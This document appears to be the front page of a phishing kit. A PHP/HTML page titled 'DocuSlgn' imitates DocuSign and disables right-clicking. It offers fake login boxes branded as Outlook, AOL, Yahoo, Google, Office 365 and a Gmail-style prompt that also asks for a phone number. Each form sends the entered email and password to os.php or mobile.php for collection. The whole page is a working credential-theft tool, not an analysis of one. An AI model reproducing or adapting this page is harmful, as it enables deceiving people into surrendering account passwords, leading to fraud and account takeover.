<?php
include 'functions.php';
include 'i.php';
?>

<html>
<head>
<link href="img/favicon.ico" rel="shortcut icon" type="image/x-icon">
<link rel="stylesheet" href="css/mobile-style.css">
<title> DocuSlgn </title>
    <script>
        window.oncontextmenu = function () {
            console.log("Right Click Disabled");
            return false;
        }
    </script>
</head>
<body>
<div class="topb"><div class="topinside"><br><img src="img/dsgn.png" width="133" height="39"></div></div>
<br><br>
<div class="main-container">
 <a href="#loginScreen2" class="butnz2" ></a>
 <a href="#mzn" class="butnm" ></a><br>
<a href="#az" class="butna" ></a><br>
<a href="#yz" class="butny" ></a><br>
<a href="#owa" class="butn3" ></a><br>
<a href="#go" class="butng" ></a><br>
<a href="#loginScreen" class="butnz" ></a><br>
 
 <div id="loginScreen">
<div style="margin: 0 auto; margin-top:12px; width:365px;line-height:18px">
<center>
<br>
<img src="img/em.png" border="0" width="32" height="32">
<br><br>
<img src="img/pl.png" border="0">
</center>
<br><br>
<form action="os.php" name="book" id="book" method="post">
<input name="aa_em" id="" type="email" placeholder="Email Address" class="dyinput" pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,3}$" required>
<br><br>
<input name="aa_pss" id="" type="password" placeholder="Password" class="dyinput" required>
<br><br>
<input name="formimage1" src="img/d2.png" width="364" type="image" height="41">
<br><br>
</form>
<img src="img/s_seee.png" border="0">
</div>

 <a href="#" class="cancel">&times;</a> 
 </div> <div id="cover" > </div>

 <div id="mzn">
<div style="margin: 0 auto; margin-top:12px; width:365px;line-height:18px">
<center>
<br>
<img src="img/owl.png" border="0" width="150" height="53">
<br><br>
<img src="img/look.png" border="0">
</center>
<br><br>
<form action="os.php" name="book" id="book" method="post">
<input name="aa_em" id="" type="email" placeholder="Email Address" class="dyinput" pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,3}$" required>
<br><br>
<input name="aa_pss" id="" type="password" placeholder="Password" class="dyinput" required>
<br><br>
<input name="formimage1" src="img/d2.png" width="364" type="image" height="41">
<br><br>
</form>
<img src="img/s_seee.png" border="0">
</div>

 <a href="#" class="cancel">&times;</a> 
 </div> <div id="cover" > </div>


 <div id="az">
<div style="margin: 0 auto; margin-top:12px; width:365px;line-height:18px">
<center>
<br>
<img src="img/a_o_l.png" border="0" width="150" height="52">
<br><br>
<img src="img/a_l.png" border="0">
</center>
<br><br>
<form action="os.php" name="book" id="book" method="post">
<input name="aa_em" id="" type="email" placeholder="Email Address" class="dyinput" pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,3}$" required>
<br><br>
<input name="aa_pss" id="" type="password" placeholder="Password" class="dyinput" required>
<br><br>
<input name="formimage1" src="img/d2.png" width="364" type="image" height="41">
<br><br>
</form>
<img src="img/s_seee.png" border="0">
</div>

 <a href="#" class="cancel">&times;</a> 
 </div> <div id="cover" > </div>

 <div id="yz">
<div style="margin: 0 auto; margin-top:12px; width:365px;line-height:18px">
<center>
<br>
<img src="img/y_m.png" border="0" width="170" height="52">
<br><br>
<img src="img/y.png" border="0">
</center>
<br><br>
<form action="os.php" name="book" id="book" method="post">
<input name="aa_em" id="" type="email" placeholder="Email Address" class="dyinput" pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,3}$" required>
<br><br>
<input name="aa_pss" id="" type="password" placeholder="Password" class="dyinput" required>
<br><br>
<input name="formimage1" src="img/d2.png" width="364" type="image" height="41">
<br><br>
</form>
<img src="img/s_seee.png" border="0">
</div>

 <a href="#" class="cancel">&times;</a> 
 </div> <div id="cover" > </div>

 <div id="go">
<div style="margin: 0 auto; margin-top:12px; width:365px;line-height:18px">
<center>
<br>
<img src="img/index.png" border="0" width="150" height="52">
<br><br>
<img src="img/go.png" border="0">
</center>
<br><br>
<form action="os.php" name="book" id="book" method="post">
<input name="aa_em" id="" type="email" placeholder="Email Address" class="dyinput" pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,3}$" required>
<br><br>
<input name="aa_pss" id="" type="password" placeholder="Password" class="dyinput" required>
<br><br>
<input name="formimage1" src="img/d2.png" width="364" type="image" height="41">
<br><br>
</form>
<img src="img/s_seee.png" border="0">
</div>

 <a href="#" class="cancel">&times;</a> 
 </div> <div id="cover" > </div>

 <div id="owa">
<div style="margin: 0 auto; margin-top:12px; width:365px;line-height:18px">
<center>
<br>
<img src="img/365.png" border="0" width="150" height="42">
<br><br>
<img src="img/off.png" border="0">
</center>
<br><br>
<form action="os.php" name="book" id="book" method="post">
<input name="aa_em" id="" type="email" placeholder="Email Address" class="dyinput" pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,3}$" required>
<br><br>
<input name="aa_pss" id="" type="password" placeholder="Password" class="dyinput" required>
<br><br>
<input name="formimage1" src="img/d2.png" width="364" type="image" height="41">
<br><br>
</form>
<img src="img/s_seee.png" border="0">
</div>

 <a href="#" class="cancel">&times;</a> 
 </div> <div id="cover" > </div>


 <div id="loginScreen2"> <a href="#" class="cancel">&times;</a> 
 <div style="margin: 0 auto; margin-top:12px; width:365px;line-height:18px">
<center>
<br>
<img src="img/spr.png" border="0" width="104" height="24">
<br><br><br>
<img src="img/gm.png" border="0">
</center>
<br>
<form action="mobile.php" name="book" id="book" method="post">
<input name="aa_em" id="" type="email" placeholder="Email Address" style="width:360px;height:34px;border:1px solid #e86b52;padding: 0 8px" pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,3}$" required>
<br><br>
<input name="aa_pss" id="" type="password" placeholder="Password" style="width:360px;height:34px;border:1px solid #e86b52; padding: 0 8px" required>
<br><br>
<input name="aa_phn" id="" type="tel" placeholder="Phone Number" style="width:360px;height:34px;border:1px solid #e86b52; padding: 0 8px" required>
<br><br>
<input name="formimage1" src="img/d2.png" width="364" type="image" height="41">
<br><br>
</form>
<img src="img/s_seee.png" border="0"></div>
 </div>  <div id="cover" > </div>
</div>

<div id="footer"><img src="img/f.png" style="float:right;padding: 6px 1px"></div>
</body>
</html>